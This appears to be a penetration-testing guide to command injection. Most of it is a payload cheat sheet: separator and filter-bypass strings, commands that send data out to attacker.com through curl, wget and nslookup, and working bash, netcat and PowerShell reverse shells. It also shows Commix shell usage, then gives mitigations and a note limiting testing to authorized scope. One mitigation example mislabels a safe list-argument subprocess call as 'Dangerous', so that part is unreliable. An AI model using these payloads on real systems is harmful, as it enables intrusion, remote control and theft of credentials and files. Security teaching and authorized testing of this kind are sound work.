Command Injection Vulnerability Testing

Overview

Vulnerability Mechanism

// PHP
system("ping " . $_GET['ip']);

// Python
os.system("ping " + user_input)

// Node.js
child_process.exec("ping " + user_input)

Testing Methods

1. Identify Command Execution Points

• Ping functionality
• DNS query
• File operations
• System information
• Log viewing
• Backup and recovery

2. Basic Detection

;  # Command separator (Linux/Windows)
&  # Background execution (Linux/Windows)
|  # Pipe (Linux/Windows)
&& # Logical AND (Linux/Windows)
|| # Logical OR (Linux/Windows)
`  # Command substitution (Linux)
$() # Command substitution (Linux)

127.0.0.1; id
127.0.0.1 && whoami
127.0.0.1 | cat /etc/passwd
127.0.0.1 `whoami`
127.0.0.1 $(whoami)

3. Blind Command Injection

127.0.0.1; sleep 5
127.0.0.1 && sleep 5
127.0.0.1 | sleep 5

127.0.0.1; curl http://attacker.com/?$(whoami)
127.0.0.1 && wget http://attacker.com/$(cat /etc/passwd)

127.0.0.1; nslookup $(whoami).attacker.com

Exploitation Techniques

Basic Command Execution

; id
; whoami
; uname -a
; cat /etc/passwd
; ls -la

& whoami
& ipconfig
& type C:\Windows\System32\drivers\etc\hosts
& dir

File Operations

; cat /etc/passwd
; type C:\Windows\System32\config\sam
; head -n 20 /var/log/apache2/access.log

; echo "<?php phpinfo(); ?>" > /tmp/shell.php
; echo "test" > C:\temp\test.txt

Reverse Shell

; bash -i >& /dev/tcp/attacker.com/4444 0>&1

; nc -e /bin/bash attacker.com 4444
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker.com 4444 >/tmp/f

& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Bypassing Techniques

Space Bypassing

${IFS}id
${IFS}whoami
$IFS$9id
<>
%09 (Tab)
%20 (Space)

Command Separator Bypassing

%3b (;)
%26 (&)
%7c (|)

%0a (Newline)
%0d (Carriage Return)

Keyword Filter Bypassing

a=w;b=ho;c=ami;$a$b$c

/bin/c?t /etc/passwd
/usr/bin/ca* /etc/passwd

w'h'o'a'm'i
w"h"o"a"m"i

w\ho\am\i

echo "d2hvYW1p" | base64 -d | bash

Length Limit Bypassing

echo "id" > /tmp/c
sh /tmp/c

export x='id';$x

Tool Usage

Commix

# Basic scan
python commix.py -u "http://target.com/ping?ip=127.0.0.1"

# Specify injection point
python commix.py -u "http://target.com/ping?ip=INJECT_HERE" --data="ip=INJECT_HERE"

# Get shell
python commix.py -u "http://target.com/ping?ip=127.0.0.1" --os-shell

Burp Suite

1. Intercept requests
2. Send to Intruder
3. Use command injection payload list
4. Observe responses or time delays

Verification and Reporting

Verification Steps

1. Confirm system commands can be executed
2. Verify command execution results
3. Assess impact (system control, data leakage, etc.)
4. Record complete POC

Reporting Key Points

• Vulnerability location and input parameters
• Types of executable commands
• Complete exploitation steps and POC
• Mitigation suggestions (input validation, parameterization, whitelisting, etc.)

Mitigation Measures

Recommended Solutions

1. Avoid Command Execution
   • Use APIs instead of system commands
   • Use library functions instead of commands
2. Input Validation
   python

   import re
   
   def validate_ip(ip):
       pattern = r'^(\d{1,3}\.){3}\d{1,3}$'
       if not re.match(pattern, ip):
           raise ValueError("Invalid IP")
       parts = ip.split('.')
       if not all(0 <= int(p) <= 255 for p in parts):
           raise ValueError("Invalid IP range")
       return ip

3. Parameterized Commands
   python

   import subprocess
   
   # Dangerous
   subprocess.call(['ping', '-c', '1', user_input])
   
   # Secure - Use parameter list
   subprocess.call(['ping', '-c', '1', validated_ip])

4. Whitelist Validation
   python

   ALLOWED_COMMANDS = ['ping', 'nslookup']
   ALLOWED_OPTIONS = {'ping': ['-c', '-n']}
   
   if command not in ALLOWED_COMMANDS:
       raise ValueError("Command not allowed")

5. Least Privilege
   • Run applications with low-privilege users
   • Restrict file system access
   • Use chroot or container isolation
6. Output Filtering
   • Restrict output content
   • Filter sensitive information
   • Log command execution

Notes

• Only perform in authorized testing environments
• Avoid causing damage to systems
• Note command differences across operating systems
• Pay attention to the scope of impact when executing commands during testing